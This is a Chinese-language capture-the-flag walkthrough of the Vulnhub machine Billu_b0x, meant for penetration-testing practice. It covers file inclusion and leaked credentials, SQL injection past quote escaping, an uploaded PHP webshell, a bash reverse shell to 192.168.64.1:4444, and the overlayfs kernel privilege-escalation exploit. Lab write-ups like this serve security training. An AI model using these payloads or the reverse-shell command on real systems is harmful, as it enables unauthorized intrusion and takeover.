Vulnhub靶场渗透练习(二) Billu_b0x

运行虚拟机直接上nmap扫描 获取靶场ip

nmap 192.168.18.*

开放端口 

TCP 22 SSH OpenSSH 5.9p1

TCP 80 HTTP Apache httpd 2.2.22

192.168.18.143  打开页面 爆破路径 获得

test.php、add.php、in.php、c.php、index.php、show.php等 猜想c.php 能够有一句话 在爆破一句话

一次打开 发现 test.php

要一个file 猜想多是文件包含   输入

成功下载文件 

in.php 是phpinfo 文件

ctril+f  搜索 SCRIPT_FILENAME   获得跟路径

把刚刚暴露的文件依次下载发现 c.php 里面有链接mysql 的帐号密码 在phpmyadmin 下可能存在默认配置文件

用户名：billu密码：b0x_billu数据库名：ica_lab登陆

 

 在尝试读取phpmyadmin的默认配置文件  file=/var/www/phpmy/config.inc.php  获得mysql root 的帐号密码

root密码：roottoor  既然已经获取了 他的22端口开着能够尝试登陆

 登陆成功 root权限 

这里我也能够看到原先主页的sql 注入 提示  下载源码

对单引号作了转义  这样我想起来 一个ctf 题 也是对单引号进行转义   直接利用 在单引号前面加个反斜杠对反斜杠进行转义构建slq注入语句

成功注入登陆成功

进去查看页面发现 panel.php  利用任意下载漏洞 下载 在前面源码中也有包含 panel.php 文件的代码

 

 代码审计发现 文件包含 上传一张图片马让后包含

利用以前扫描出来的路径查看  /uploaded_images/

 

让后直接包含

这里 能够在  马里写一个get 请求反弹shell

cmd=echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash  cmd 后门的命令须要url 编码

<?php system($_GET['cmd']); ?> 利用 system 函数执行系统命令

这里也能够利用菜刀或者蚁剑链接 打开蚁剑

链接

打开虚拟终端输入 u'na'me -a   ‘不影响命令读取

( www-data:/var/www) $ u'na'me -a

Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux

能够利用linux 内核提权

https://www.exploit-db.com/exploits/37292

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation 

差很少两种提权思路